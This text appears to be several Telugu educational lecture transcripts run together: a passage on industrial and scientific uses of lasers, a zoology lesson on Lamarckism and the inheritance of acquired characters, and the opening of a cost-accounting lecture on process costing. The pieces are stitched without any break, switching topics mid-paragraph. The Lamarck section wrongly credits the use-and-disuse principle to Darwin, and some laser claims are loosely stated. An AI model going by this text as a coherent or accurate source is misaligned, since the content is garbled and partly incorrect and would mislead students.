వాడుకోవచ్చు. అయితే గ్యాస్ లేజర్స్తో పాటు వాటిని అసిస్ట్ చేయడానికి ఆక్సిజన్ గ్యాస్ కానీ, కార్బన్ డైఆక్సైడ్ కానీ కలిపి పంపించాల్సి ఉంటుంది. అయితే ఎక్కువగా ఈ లేజర్ కటింగ్ ఫినామినన్ ప్రజెంట్ డేస్లో గార్మెంట్ ఇండస్ట్రీస్లో వాడుతున్నాం. గార్మెంట్ ఇండస్ట్రీస్లో ఏమవుతుందంటే ఎక్కువ లేయర్స్లో ఉన్న క్లాత్ని, థిక్ క్లాత్ని అట్ ఏ టైం సింగిల్ టైం ఇంటర్వెల్లో, చాలా షార్ట్ టైం ఇంటర్వెల్లో కట్ చేయడానికి మనం ఈ లేజర్ కటింగ్ ఫినామినన్ అనేది గార్మెంట్ ఇండస్ట్రీలో వాడడం జరుగుతుంది. నెక్స్ట్ లేజర్ హార్డనింగ్. లేజర్ హార్డనింగ్లో జరిగే ప్రాసెస్ ఏంటి? అది ఒక మెటీరియల్ సర్ఫేస్ని ఇర్రేడియేషన్ ప్రాసెస్ అనేది షార్ట్ ఇంటర్వెల్ ఆఫ్ టైంలో ఇర్రేడియేషన్కి గురి చేస్తే ఆ పైన మెటీరియల్ మొత్తం మనకి మెల్ట్ అవుతుంది. కానీ కిందనున్న మెటీరియల్ ఇమీడియట్గా కూలింగ్ అరేంజ్మెంట్కి లోన్ కావడం వల్ల ఆ మెటీరియల్ మొత్తం హార్డెన్ అవుతుంది. కాబట్టి మొత్తం కిందనున్న మెటీరియల్ కూడా హార్డనింగ్ అవ్వడం వల్ల ఇది మనకి పాసిబుల్ సబ్స్టిట్యూషన్ ఆఫ్ ఎక్స్పెన్సివ్ అలాయ్ స్టీల్స్లో ఎక్స్పెన్సివ్ మెటీరియల్స్ ఏమైనా ఉంటే వాటి ప్లేసెస్లో ఈ లేజర్ హార్డనింగ్ ద్వారా తయారు చేయబడిన మెటీరియల్స్ వాడుకోవచ్చు. ఇందులో మనం వాడేది CO2 లేజర్.
నెక్స్ట్ మెట్రాలజీలో ఏమవుతుందంటే మనం ఆప్టికల్ క్యారెక్టరిస్టిక్స్ని కానీ లేదా వెలాసిటీస్ని కానీ లెంత్ని కానీ మెజర్ చేయడం జరుగుతుంది. నెక్స్ట్ అదేవిధంగా మనకి డిస్టెన్సెస్ని వేవ్ లెంత్ రూపంలో మెజర్ చేయొచ్చు. ఇందులో మనం వాడేది హీలియం నియాన్ లేజర్. నెక్స్ట్ ఇందులో మనం వాడే డివైస్ లేజర్ అల్టిమీటర్. ఈ లేజర్ అల్టిమీటర్ దేనికి ఉపయోగపడుతుందంటే ఎయిర్ క్రాఫ్ట్స్ యొక్క హైట్ ఎంత హైట్లో ఉన్నాయి గ్రౌండ్ నుంచి ఆ హైట్ని మెజర్ చేయొచ్చు. అలాగే వాటి రేట్ ఆఫ్ అసెంట్ని కానీ రేట్ ఆఫ్ డిసెంట్ని కానీ మెజర్ చేయొచ్చు. నెక్స్ట్ ఇందులో క్లౌడ్స్ ఉంటే డిఫరెంట్ క్లౌడ్స్, ఆ క్లౌడ్స్ ఎర్త్ సర్ఫేస్ నుంచి ఎంత హైట్లో ఉన్నాయి కూడా ఈ లేజర్ అల్టిమీటర్ను ఉపయోగించి మనం మెజర్ చేయొచ్చు. ఇందులో వాడేది హీలియం నియాన్ లేజర్. నెక్స్ట్ సర్వేయింగ్. ఈ సర్వేయింగ్ డివైసెస్లో మనం ఎక్కువగా వాడేది జియోడీమీటర్. ఈ జియోడీమీటరు ఏ ప్రిన్సిపల్ పై ఆధారపడుతూ పనిచేస్తుంది. ఈ జియోడీమీటర్ ఏం చేస్తుందంటే దీని నుంచి ఎలక్ట్రోమాగ్నెటిక్ వేవ్స్ని పంపి ఎలక్ట్రోమాగ్నెటిక్ వేవ్స్ ఆ మీడియంలో ఎంత టైంలో ట్రావెల్ చేస్తాయి ఆ టైంని క్యాలిక్యులేట్ చేసి దాని నుంచి డిస్టెన్సెస్ని మెజర్ చేస్తాయి. సో ఈ జియోడీమీటర్లో మనకి అబ్జర్వ్ చేస్తే దాని ఫంక్షన్లో ఒక లైట్ సోర్స్ అనేది వాడడం అవసరం అవుతుంది. ఈ లైట్ సోర్స్ కనుక మనం లేజర్ లైట్ సోర్స్ వాడితే మనకి యాక్యురేట్ మెజర్మెంట్స్ వస్తాయి, అదేవిధంగా ఫాస్టర్ మెజర్మెంట్స్ వస్తాయి, అదేవిధంగా లాంగ్ రేంజ్ మెజర్మెంట్స్ వస్తాయి. సిమిలర్గా ఆప్టికల్ ఫైబర్ కమ్యూనికేషన్. ఈ ఆప్టికల్ ఫైబర్ కమ్యూనికేషన్లో ఎప్పుడైతే ఇన్ఫర్మేషన్ మొత్తం లైట్ వేవ్ రూపంలోకి మారుతుందో ఆ సమయంలో మొత్తం ఇన్ఫర్మేషన్ మొత్తం కూడా చాలా ఫాస్ట్గా మనకి రిసీవింగ్ ఎండ్కి వెళ్తుంది. ఈ రిసీవింగ్ ఎండ్ వెళ్ళడం వల్ల ఇన్ఫర్మేషన్ చాలా తక్కువ టైంలో ఒక ఎండ్ నుంచి ఇంకొక ఎండ్కి ట్రావెల్ చేస్తుంది. దీస్ ఆర్ ద అడ్వాంటేజెస్ ఆఫ్ ద లేజర్ ఫైబర్ ఆప్టికల్ ఫైబర్ కమ్యూనికేషన్. అదేవిధంగా డేటా స్టోరేజ్. ఒక థిన్ ఫిల్మ్ మీద మనకి హై ఎనార్మస్ డేటా అనేది లేజర్స్ ఉపయోగించి స్టోర్ చేయొచ్చు. దీస్ ఆర్ ద రీడ్ అండ్ రైట్ లేజర్స్ విచ్ ఆర్ యూజ్డ్ ఫర్ రీడింగ్ ఆర్ రైటింగ్ ద ఇన్ఫర్మేషన్. కాకపోతే ఈ డేటా స్టోరేజ్ వల్ల మనకు వచ్చే మెయిన్ డిసడ్వాంటేజ్ ఏంటంటే మనకి అది నాట్ ఎరేజబుల్. అదేవిధంగా హాలోగ్రఫీ ఏంటంటే 3D ఇమేజెస్ని ప్రొడ్యూస్ చేయడానికి ఉపయోగపడుతుంది. సో దిస్ ఈజ్ ద 3D ఇమేజ్ ఆఫ్ బ్రెయిన్ అండ్ దిస్ ఈజ్ ద 3D ఇమేజ్ ఆఫ్ ద గ్లోబ్. అదేవిధంగా ప్రింటింగ్ సెక్టర్లో మనం లేజర్ ప్రింటర్స్ మన డే టు డే లైఫ్లో చాలా వాడుతున్నాం. అదేవిధంగా హై స్పీడ్ ఫోటోగ్రఫీ అంటే ఒక బుల్లెట్ని ఒక గన్ నుంచి వస్తున్న బుల్లెట్ని ఫోటోగ్రాఫ్ చేయడంలో కానీ లేదా ఆర్మర్ పెనిట్రేషన్స్లో కానీ మనం ఈ లేజర్ లైట్ని వాడడం వల్ల మనకు ఆ ఫోటోగ్రఫీ అనేది క్లియర్గా వస్తుంది. నెక్స్ట్ డిఫరెంట్ రీసెర్చ్ ఫీల్డ్స్లో వాడచ్చు వీటిని మనం. ఫీల్డ్ ఆఫ్ ఫిజిక్స్ ఆర్ కెమిస్ట్రీ అండ్ బయాలజీ. అదేవిధంగా మనకి ఎంటర్టైన్మెంట్ సెక్టర్లో కూడా మనం వీటిని బాగా వాడచ్చు. డిఫరెంట్ ఫోర్ట్స్లో మనకి లేజర్ లైట్ షోస్ ఉంటున్నాయి. సో ఈ లేజర్ లైట్ షోస్ హై ప్రొజెక్టెడ్ లేజర్ బీమ్స్ అనేవి మ్యూజిక్తో పాటు డ్యాన్స్ అవుతుంటాయి. అదేవిధంగా మనకు డిఫరెంట్ మూవీస్లో స్పెషల్ ఎఫెక్ట్స్ అనేవి ఈ లేజర్ లైట్స్ వల్లే మనకి ప్రొడ్యూస్ అవుతున్నాయి. సో థ్యాంక్ యూ. ఈరోజు మనం ఈ పాఠ్యాంశంలో ద్వితీయ సంవత్సరం జంతుశాస్త్రానికి సంబంధించి జీవ పరిణామం అనేటటువంటి పాఠ్యాంశంలో కొన్ని ముఖ్యమైనటువంటి జీవ పరిణామ సిద్ధాంతాలను గురించి చర్చించుకుందాం. జీవ పరిణామానికి సంబంధించి ప్రారంభంలో నిర్జీవ సృష్టివాదం, ఎబయోజెన్సిస్ సిద్ధాంతం, ప్రత్యేక సృష్టివాదం అనేటటువంటి సిద్ధాంతాలను ప్రతిపాదించిన తరువాత మొదటగా శాస్త్రవేత్తలందరికీ ఆమోదయోగ్యమైనటువంటి సిద్ధాంతాన్ని ప్రతిపాదించినటువంటి శాస్త్రవేత్త ఎవరంటే లామార్క్. సో లామార్క్ ప్రతిపాదించినటువంటి పరిణామ సిద్ధాంతాన్ని మనం మొదటగా చూద్దాం.
లామార్క్ ప్రతిపాదించినటువంటి సిద్ధాంతాన్ని లామార్కిజం అంటాం. లామార్క్ ఏదైతే జీవ పరిణామానికి సంబంధించి సిద్ధాంతాన్ని ప్రతిపాదించారో ఆ ప్రతిపాదనలో ఉన్నటువంటి ముఖ్యమైనటువంటి అంశం ఏంటంటే ఆర్జిత గుణాల అనువంశికత. జీవ పరిణామం తీసుకున్నప్పుడు వాతావరణంలో సంభవించేటటువంటి మార్పులకు అనుగుణంగా జీవులు కొన్ని ప్రత్యేక మార్పులను పొందుతాయి. ఆ పొందినటువంటి మార్పులు ఏ రకంగా అనువంశికత చెందుతాయి అంటే తర్వాత తరాలకు అందచేయబడతాయో లామార్క్ వివరించడానికి ప్రయత్నం చేశారు. ఇక్కడ మనం మొదటగా గుర్తుపెట్టుకోవాల్సింది ఏంటంటే ఈ పరిణామ సిద్ధాంతాలన్నీ కూడా పరిణామం గురించి నిర్వచనం ఇవ్వలేదు, పరిణామం ఎలా జరిగిందో చెప్పడానికి ప్రయత్నం చేసింది. జీవ పరిణామం అంటే జీవ పరిణామం మనకు నిర్వచనం మనందరికీ తెలిసిందే. అంటే సరళమైనటువంటి జీవుల నుంచి సంక్లిష్టమైనటువంటి జీవుల యొక్క అభివృద్ధి, ఆ ప్రక్రియను అధ్యయనాన్ని మనం జీవ పరిణామానికి నిర్వచించుకుంటే ఆ ప్రక్రియ అనేది జీవ సంబంధంగా వాతావరణంతో మమేకమై ఏ రకంగా సంభవించిందో చెప్పడానికి ప్రయత్నం చేసినయే ఈ పరిణామ సిద్ధాంతాలు. మొదటగా మనం లామార్కిజం గురించి చూద్దాం. సో ఈ లామార్కిజం ఈ పాఠ్యాంశం యొక్క ముఖ్య ఉద్దేశం ఏంటంటే మనం మొదటగా లామార్కిజం అంటే ఏంటో చూస్తాం. తర్వాత జీవ పరిణామంలో లామార్కిజం యొక్క విశిష్టత, దాని యొక్క ప్రాముఖ్యత, అంటే అంతకుముందు చెప్పినటువంటి పరిణామ సిద్ధాంతాలన్నీ పరిగణలోకి తీసుకుంటే దానికిను ఇప్పుడు చెప్పబోయేటటువంటి లామార్కిజానికి ఉన్నటువంటి భేదం ఏమిటి, ఏ రకంగా లామార్క్ సిద్ధాంతం అనేది శాస్త్రవేత్తలు ఆమోదయోగ్యమైంది అనేది మనం గమనిస్తాం. తర్వాత లామార్క్ చెప్పినటువంటి లామార్కిజానికి సంబంధించి ఉదాహరణలు ఏ రకంగా ఉంటే చూద్దాం. సో ఈ పటంలో చూస్తే కనుక జీన్ బాప్టిస్ట్ డి లామార్క్ 1744-1829 ఈయన ఫ్రెంచ్ శాస్త్రవేత్త జీవ పరిణామానికి సంబంధించి లామార్కిజం లేదా ఆర్జిత గుణాల అనువంశికత అనేటటువంటి సిద్ధాంతాన్ని ప్రతిపాదించారు. లామార్క్ రచించినటువంటి గ్రంథం తీసుకుంటే కనుక ఫిలాసఫీ జూలాజిక్ అనేటటువంటి గ్రంథాన్ని ఈ పరిణామ సిద్ధాంతాలకు సంబంధించినటువంటి పరిశోధనలు మరియు పరిణామ సిద్ధాంతాలకు సంబంధించినటువంటి అన్ని పరిశీలనల్ని క్రోడీకరించి రచించినటువంటి గ్రంథమే ఫిలాసఫీ జూలాజిక్. లామార్క్ సిద్ధాంతాన్ని లామార్కిజం అంటే దాంట్లో ఏం వివరిస్తుంది, లామార్కిజం లేదా ఆర్జిత గుణాల అనువంశికత అనేది జీవ పరిణామానికి సంబంధించి లామార్క్ ప్రతిపాదించినటువంటి సిద్ధాంతం. లామార్కిజం విశ్లేషించేది ప్రధానమైనటువంటి అంశం ఏంటంటే కనుక ఆర్జిత గుణాల అనువంశికత. ఒక జీవి తన జీవిత కాలంలో ఏదైతే కొన్ని ప్రత్యేక లక్షణాలను పొందిందో ఆ పొందినటువంటి లక్షణాలని తర్వాత ఈ లామార్కిజంలో లామార్క్ ఏ రకంగా వాతావరణ పరిస్థితులు లేదా వాతావరణ మార్పులని జీవి మీద ప్రభావితం చేస్తాయి, జీవిని ప్రభావితం చేస్తాయని పరిగణలోకి తీసుకుంటూ చెప్పినటువంటి మొదటి అంశం ఏంటంటే బాహ్య వాతావరణంలోని మార్పులను బట్టి జీవులలో మార్పులు వస్తాయి. రెండో అంశం జీవులలో భిన్నత్వానికి కారణం మూల ప్రామాణికమైనటువంటి ఏకత్వం. సో లామార్కు తన సిద్ధాంతాన్ని లామార్కిజం లేదంటే కనుక మనం ఆర్జిత గుణాల అనువంశికత మనం చెప్పుకున్నాం కదా, ఈ చెప్పేటప్పుడు ఆయన పరిశీలించినటువంటి అంశాలు ఈ రెండు ప్రధానమైనటువంటి అంశాలు. మొదటిది బాహ్య వాతావరణంలో మార్పులను బట్టి జీవులలో మార్పులు వస్తాయి. అంటే జీవులన్నీ కూడా జీవి చుట్టూ ఉన్నటువంటి వాతావరణాన్ని తీసుకుంటే కనుక మాధ్యమం లేదా వాతావరణం అనుకుంటాం. ఈ వాతావరణంలో సంభవించేటటువంటి మార్పులను బట్టి జీవులలో మార్పులు వస్తాయని ఫస్ట్ ప్రతిపాదన తను పరిశీలించినటువంటి మొదటి అంశం అది. రెండోది జీవులలో భిన్నత్వానికి కారణం మూల ప్రామాణికమైనటువంటి ఏకత్వం. ఇక్కడ ప్రతి జీవి ఇంకొక జాతి తీసుకున్నప్పుడు ఒక జాతికి ఇంకో జాతికి తేడాలు కనిపిస్తూ ఉంది. ఆ తేడా కనిపించడానికి కారణం ఏంటో వివరిస్తా ఆయన ఏం చెప్పాడంటే మౌలికంగా ప్రతి జీవి తీసుకున్నప్పుడు ఆ జీవికి ఉండవలసిన జంతు లక్షణాలు తీసుకుంటా ఉన్నప్పుడు ఆ అన్నీ కూడా సమానత్వాన్ని ప్రదర్శిస్తాయి. మనం జీవులు తీసుకుంటే కనుక జీవి యొక్క నిర్మాణాత్మక క్రియాత్మక ప్రమాణం కణమని చెప్తాం. ఏ జీవులైనా సరే ప్రాథమిక ప్రమాణం కణమైనప్పుడు అన్నిట్లోనూ ఏకత్వం ఉంది. కానీ క్రియాత్మకంగా తీసుకున్నప్పుడు దాంట్లో భిన్నత్వం అనేది ప్రారంభమవటం కారణంగా
పరిణామం అనేది సాధ్యపడింది అనేటటువంటి లామార్క్ యొక్క వాదన అన్నమాట. కాబట్టి ఈ రెండు ప్రామాణిక అంశాలు, మొదటిదన్నా చుట్టూ ఉన్నటువంటి వాతావరణము జీవిలో మార్పులను కలగజేస్తుంది, రెండోది ఏమన్నా జీవులలో ఉన్నటువంటి ఏదైతే ఏకత్వం ఉందో, సిమిలారిటీ లేదా యూనిఫామిటీ ఉందో, అదేమవుతోంది కొన్ని సందర్భాలలో ఈ పర్యావరణ కారణాలు కావచ్చు, వాతావరణ కారణాలు కావచ్చు, దాని వలన ఏమవుతుంది భిన్నత్వానికి దారితీస్తోంది. సో ఏదైనా మార్పు అనేది సంభవిస్తోంది. ఈ మార్పు కారణంగా కొత్త జీవుల యొక్క ఆవిర్భావం జరుగుతుంది అని లామార్క్ యొక్క వాదన అన్నమాట. నెక్స్ట్, ఈ మార్పులు ఎలా సంభవిస్తాయి అనే దాని మీద లామార్క్ చెప్పినటువంటి విశ్లేషణ చూడండి. జీవుల శరీర భాగాలు జీవన అంతర్గత కారకాలతో ప్రభావితమయ్యి నిరంతరం పరిమాణంలో పెరుగుతాయి. సో ఫస్ట్ కాన్సెప్ట్ ఇప్పుడు ఏం చెప్పాడు, జీవి యొక్క పరిసరాల కారణంగా జీవిలో మార్పులు సంభవిస్తాయని లామార్క్ ప్రతిపాదించాడు. ఓకే కాదంట్లా ప్రతిపాదించాడు. ఈ ప్రతిపాదనకి ఏం చేశాడు, ఆయన రుజువు చూపించాడు కదా. చూపించేటటువంటి ప్రయత్నంలో ఏం చెప్పాడు, ఫస్ట్ చెప్పింది జీవుల శరీర భాగాలు జీవన అంతర్గత కారకాలతో ప్రభావితమై నిరంతరం పరిమాణంలో పెరుగుతాయి అని చెప్పాడు. అంటే ఏంటి, ప్రతి జీవికి శరీరంలో శరీర భాగాలు ఉంటాయి. శరీర భాగాల యొక్క క్రియాశీలత అనేది వాతావరణం చేత ప్రభావితం చేయబడి వాటి యొక్క పెరుగుదల ఉంటుందని ప్రతిపాదించారు. అంటే ఏదైతే అవయవం అవసరం అవుతుందో ఆ అవసరం అయ్యేటటువంటి అవయవం పెరుగుదల చూపిస్తూ ఉంటుంది. సో సాధారణ జీవి ఇక్కడ ఈ పెరుగుదల కలిగినటువంటి ఒక అవయవంలో పెరుగుదల కలిగినటువంటి జీవిని మనం తీసుకున్నప్పుడు ఆ జీవికి ఈ జీవికి ఆ క్రియాత్మక దృష్ట్యా మొదట్లో తేడా అనేది అక్కడ సంభవిస్తుంది ఫస్ట్. సో ఇది ప్రాథమిక అంశం, మూల అంశం. రెండు మూల అంశాల్లో ఇది ప్రాథమిక మూల అంశం అన్నమాట. సో ఆయన చెప్పింది ఏంటంటే అంతర్గత కారకాలు, ఈ బాహ్య వాతావరణం ఒక అంశం తీసుకున్నాడు, రెండో అంశం ఏంటంటే అంతర్గత కారకాలు కూడా చెప్తున్నాడు. ఏదైతే జీవి లోపల అంతర్గతంగా ఉన్నటువంటి అంశాలు, శరీర ధర్మపరమైనటువంటి క్రియలు ఉన్నాయి చూసారా, అవి ఈ బాహ్య వాతావరణం చేత ప్రభావితమయ్యి మార్పులు అనేవి సంభవిస్తాయి. సో ఈ మార్పు అనేది మనం ప్రామాణికంగా మనం తీసుకుంటాం. నెక్స్ట్ తర్వాత ఏం చెప్పారో చూడండి. కొత్త అవసరాలకు అనుగుణంగా కొత్త శరీర భాగాలు అభివృద్ధి చెంది స్థిరంగా నిలిచిపోతాయి. వీటినే ఆర్జిత గుణాలు అంటారు. సో ఇంకొక ఇంపార్టెంట్ కాన్సెప్ట్, మనం జీవ పరిణామంలో లామార్క్ చెప్పినప్పుడు లామార్క్ సిద్ధాంతం పేరే ఆర్జిత గుణాల అనువంశికత అని అన్నాం. ఇందాక మనం ఫస్ట్లో మాట్లాడుకున్నాం జీవి యొక్క పరిసరాలలో మార్పులు అని చెప్పాం. పరిసరాలలో మార్పులు ఏం చేస్తున్నాయి, కొత్త అవసరాలను సృష్టిస్తున్నాయి. కొత్త అవసరాలకు అనుగుణంగా జీవులు ఏం చేస్తాయి, ఆ అవసరాలకి అనుగుణంగా కొత్త శరీర భాగాలను అభివృద్ధి చేసుకుంటాయి. అంటే దేహ నిర్మాణంలో చిన్న చిన్న మార్పులు, అంటే ఒక్కసారిగా ఆల్ ఆఫ్ సడన్గా రాదు. కొన్ని వందల వేల సంవత్సరాల పరిణామక్రమం తీసుకున్నప్పుడు మార్పులన్నీ మనం అబ్జర్వ్ చేయగలం. సో కొత్త శరీర భాగాల అభివృద్ధి అనేది జరుగుతూ ఉంటుంది. ఇది బాహ్య వాతావరణంలో మార్పులు, బాహ్య వాతావరణంలో మార్పులకు అనుగుణంగా జీవులలో అవసరాలు మారతాయి. మారినటువంటి అవసరాలకు అనుగుణంగా ఏమవుతుంది, శరీర భాగాల మార్పు జరుగుతుంది. సో శరీర భాగాల మార్పు ఎప్పుడైతే సాధ్యపడిందో, శరీర భాగాల మార్పు ఎప్పుడైతే జరిగిందో, ఈ జరిగిన కారణంగా ఏం జరుగుతుంది, అక్కడ ఉన్నటువంటి జీవిలో, అక్కడ ఉన్నటువంటి జాతిలో చిన్న మార్పు, ఫస్ట్ మొట్టమొదటిగా తీసుకుంటే కనుక చాలా నెగ్లిజిబుల్, మనము లెక్కించలేనటువంటి గుర్తించలేనటువంటి మార్పు అనేది మనం గమనిస్తాం. కాలక్రమంలో ఏమవుతుందంటే ఈ మార్పు, ఈ అభివృద్ధి చెందినటువంటి లేదా ఏర్పడినటువంటి మార్పు, దానికి ఆర్జిత గుణం, అది ఆ జీవే పొందింది, పక్క జీవికి లేదు. ఎందుకని, ఈ జీవే మారినటువంటి వాతావరణానికి గురి కాబడింది, లేదా మారినటువంటి వాతావరణంలో ఉంది, ఉండడానికి వీలుగా అనుకూలత పొందింది. అనుకూలత పొందడంతో పాటుగా అవయవాలలో మార్పును చేసుకుంది. సో ఇలా మార్పులు ఏర్పడినటువంటి మార్పులు ఆ జీవులు తమ జీవిత కాలంలో అలా పొందుపరుచుకుంటాయి. దాంతోపాటుగా ఈ పొందుపరుచుకున్నటువంటి మార్పులు ఏం చేస్తున్నాయి, తర్వాతి తరాలకి అందించేటటువంటి ప్రయత్నం చేస్తాయి. సో దీనినే మనం ఆర్జిత గుణాలు అని అంటున్నాం. దీనినే మనం ఆర్జిత గుణాలు అని పేర్కొంటున్నాం. తర్వాత అంశం చూడండి. కొత్త అవసరాలకు అనుగుణంగా కొత్త వాతావరణంలో అనుకూలతల కోసం జీవులు కొత్త అలవాట్లను, కొత్త ప్రవర్తనను అభివృద్ధి చేసుకుంటాయి. సో ఇందాకేం చెప్పాం మనము, అవయవంలో మార్పు వస్తుందని చెప్పాం,
ఇప్పుడేం చెప్తున్నాము, అవయవంతో పాటుగా తన యొక్క ప్రవర్తన, జీవి ప్రవర్తనలో కూడా మార్పు వస్తుందని చెప్తుంది. ఇక్కడ రెండో దానికి సింక్రనైజ్ చేశాడు. అంతకుముందు ఏం చెప్పాడు, అవయవంలో మార్పు వచ్చిందన్నాడు. అవయవంలో మార్పు వచ్చినప్పుడు ఆ అవయవంలో మార్పుకు అనుగుణంగా ఇంకేం జరిగింది గమనించాడు. అక్కడ మారినప్పుడు ఏం చెప్తున్నారు, కొత్త అవసరాలకు అనుగుణంగా కొత్త వాతావరణంలో మౌలికంగా 2 అంశాలు చెప్పాం, అవయవాలలో మార్పు, ప్రవర్తనలో మార్పు. సో ఈ మార్పులు పొందడానికి కారణాలు చెప్తా 2 మార్గాలను చెప్పాడు డార్విన్ గారు. ఒకటేమన్నా ఉపయుక్తత, ఒక అవయవాన్ని ఎక్కువగా ఉపయోగించుకోవటం. రెండోది నిరుపయుక్తత, ఒక అవయవాన్ని తక్కువగా ఉపయోగించుకోవటం. అంటే అవసరాలు మార్పులను బట్టి అవయవాల యొక్క వినియోగంలో తేడా ఉంటుంది. ఎక్కువ ఉపయోగిస్తే దాన్ని ఉపయుక్తత అంటాం, తక్కువగా కనుక ఉపయోగిస్తే కనుక దాన్ని నిరుపయుక్తత అంటాం. సో ఈ అలవాట్ల కారణంగా కానీ ప్రవర్తన కారణంగా కానీ ఏమవుతుందంటే కొన్ని అవయవాలు ఎక్కువగా వినియోగం. సో ఇందాక మనం చెప్పుకున్న వాతావరణంలో మార్పులు ఎలా వస్తాయి అని. వాతావరణంలో ఉష్ణోగ్రత, కాంతి, మాధ్యమం, ఆహారం జీవులు తీసుకునే ఆహారంలో మార్పుల కారణంగా జీవి యొక్క ప్రవర్తనలోనూ చెప్పుకున్నాం మనం. ఆ మార్పులు ఎలా సాధ్యపడుతున్నాయి చూసుకుంటే కనుక ప్రవర్తన, బిహేవియర్ మరియు శరీర ధర్మక్రియలలోనూ ఫిజియలాజికల్గా కూడా దాంట్లో మార్పులు అనేవి సంభవిస్తాయి. సో వాతావరణంలో సంభవించేటటువంటి ఈ మార్పులు, ఉష్ణోగ్రత, కాంతి కానీ, మాధ్యమం కానీ, ఆహారం కానీ, అవి తీసుకునేటువంటి దాంట్లో మార్పులు కనుక ఏర్పడితే జీవి యొక్క ప్రవర్తనలో మార్పు ఏర్పడుతుంది. ఆ ప్రవర్తనలో మార్పు ఏం చేస్తుందంటే చివరికి ఇంటర్నల్గా, అంతర్గతంగా ఉన్నటువంటి శరీర ధర్మక్రియలలో కూడా మార్పుని కలగజేస్తుంది. సో ఇక్కడ ఏం చెప్తున్నామంటే మనం ఉపయుక్తత నిరుపయుక్తత సూత్రం ఆధారంగా శరీర భాగాలు ఏర్పడటం, అంటే ఏదైతే అవయవం ఎక్కువగా ఉపయోగపడిందో ఉపయోగపడినటువంటి అవయవం అభివృద్ధి చెందుతుంది. అంతకు ముందున్నటువంటి జీవికి దానికి తేడా చూసినప్పుడు ఆ అవయవం ఎక్కువ ఉపయోగపడింది కాబట్టి ఆ అవయవంలో మార్పు వచ్చింది. నిరుపయుక్తత తీసుకున్నప్పుడు అంతకు ముందున్నటువంటి జీవులు తీసుకున్నప్పుడు, అదే జాతికి చెందినటువంటి అంతకు ముందున్నటువంటి జీవిని తీసుకున్నప్పుడు, ఈ జీవికి తీసుకున్నప్పుడు ఈ జీవిలో ఈ అవయవం యొక్క ఉపయోగం అనేది తక్కువైంది కాబట్టి ఈ అవయవము పనికి రాకుండా, అంటే దాని ఏమంటే మనం అవశేష అవయవంగా లేదంటే తక్కువ స్థాయిలో వినియోగించటం వల్ల దాని యొక్క పరిణామం ఏమైంది, క్రమంగా తగ్గుతూ జరిగింది. ఆ కారణంగా ఏమవుతాయి, మొదటగా మనకి మార్పులు లేదా వైవిధ్యాలు ఏర్పడ్డాయి. సో ఇక్కడ మనం వైవిధ్యాలు అనేవి జీవ పరిణామానికి సంబంధించి ప్రమాణంగా లామార్క్ సూత్రం ప్రకారం మనం తీసుకోవచ్చు. సో వైవిధ్యం అనేది ఎట్లా వచ్చిందంటే 2 ప్రక్రియల ద్వారా. మొదటిది ఉపయుక్తత, రెండోది నిరుపయుక్తత. ఉపయుక్తత కారణంగా ఏమవుతోంది, అవయవం ఎక్కువగా ఉపయోగించబడి అవయవంలో మార్పు ఏర్పడి క్రొత్త అవయవంగా మార్పు చెందేటటువంటి ప్రక్రియ, అది ఉపయుక్తత. నిరుపయుక్తతలో ఏమవుతోంది, అవయవం తక్కువగా కనిష్ట స్థాయిలో వినియోగించుకోబడి అవయవంలో మార్పు చెంది సాధారణ అవయవానికి దానికి మార్పు ఏర్పడు. సో ఇక్కడ మనం తీసుకున్నప్పుడు ఏమవుతోంది, ఇక్కడ సాధారణ అవయవానికి ఈ మార్పు చెందినటువంటి అవయవానికి మధ్య మనం నిర్దిష్టమైనటువంటి తేడాన్ని చూస్తున్నాం. ఆ తేడానే మనం వైవిధ్యం అని పేర్కొన్నాం. లామార్క్ దృష్ట్యా దాన్ని వైవిధ్యాలు అన్నాడు. ఈ వైవిధ్యాలే జీవ పరిణామానికి సంబంధించి ప్రాథమిక ప్రమాణాలుగా మనం లామార్క్ సిద్ధాంతంలో పేర్కొనడం అనేది జరుగుతుంది. ఒక జీవితకాలంలో ఏర్పరచుకున్నటువంటి ప్రతి లక్షణము భద్రపరచబడి తర్వాతి తరాలకు అందజేయడం జరుగుతుంది. దీన్ని ఆర్జిత గుణాల అనువంశికత అంటాం. లామార్క్ సిద్ధాంతాన్నే మనం ఇందాక చెప్పుకున్నాం, ఆర్జిత గుణాల అనువంశికత అని. ఇప్పుడు ఏదైతే వైవిధ్యం ఒక జీవి పొందినదో, ఏది ఉపయుక్తత కారణంగా కానీ నిరుపయుక్తత కారణంగా కానీ పొందినటువంటి వైవిధ్యాన్ని జీవి ఏం చేస్తుంది, ఆ తరంలోనే కాకుండా తర్వాతి తరానికి అందచేయడానికి ప్రయత్నం చేస్తుంది మరియు అందిస్తుంది కూడా. ఆ అందించేటటువంటి లక్షణాన్ని, అందించేటటువంటి ప్రక్రియనే మనం ఏమంటున్నామంటే ఆర్జిత గుణాల అనువంశికత. ఇలా అందచేయటం కారణంగానే ఏం జరుగుతుంది, అక్కడ అంతకు ముందున్నటువంటి జాతికి తర్వాత వచ్చినటువంటి తర్వాతి తరానికి మధ్య తేడా అనేది కనిపిస్తుంది. సో జీవులలో వైవిధ్యాలు వాతావరణం వలన ఏర్పడతాయని పేర్కొన్నాడు. కంక్లూజన్ చేసేటప్పుడు ఏం చెప్పాడు లామార్కు,
ఈ తేడాలు ఇందాక చెప్పాం కదా, వైవిధ్యాలు, ఉపయుక్తత లేదా నిరుపయుక్తత రెండు కూడా చెప్పాడు ఆయన. చెప్పినటువంటి అంశాలు ఎలా వస్తున్నాయి అన్నాడు, వాతావరణం వ్యూయర్స్, ఈరోజు మనం కాస్టింగ్ అంశానికి సంబంధించి ప్రాసెస్ కాస్టింగ్ అనేటటువంటి ఒక అంశం గురించి పూర్తిగా మనం తెలుసుకోబోతున్నాం. కాస్టింగ్లో అతి ముఖ్యమైనటువంటి అంశం ప్రాసెస్ కాస్టింగ్. ప్రాసెస్ కాస్టింగ్ గురించి తెలుసుకునే ముందుగా కాస్టింగ్ యొక్క టోటల్ స్ట్రక్చర్ ఒకసారి మనం చూద్దాం. కాస్టింగ్ని టోటల్గా 3 భాగాలుగా విభజించడం జరిగింది. ఆ 3 భాగాలు ఏంటంటే కాస్ట్ అకౌంటింగ్ సిస్టమ్స్ అని, కాస్ట్ అకౌంటింగ్ మెథడ్స్ అని, కాస్ట్ అకౌంటింగ్ టెక్నిక్స్ అని, ఇలా 3 భాగాలుగా విభజించడం జరిగింది. ఇలా విభజించినటువంటి ఈ 3 భాగాల్లో ఈరోజు మనం తెలుసుకోబోయేటటువంటి అంశం ప్రాసెస్ కాస్టింగ్. ఇది కాస్ట్ అకౌంటింగ్ మెథడ్స్లోకి వస్తుంది. 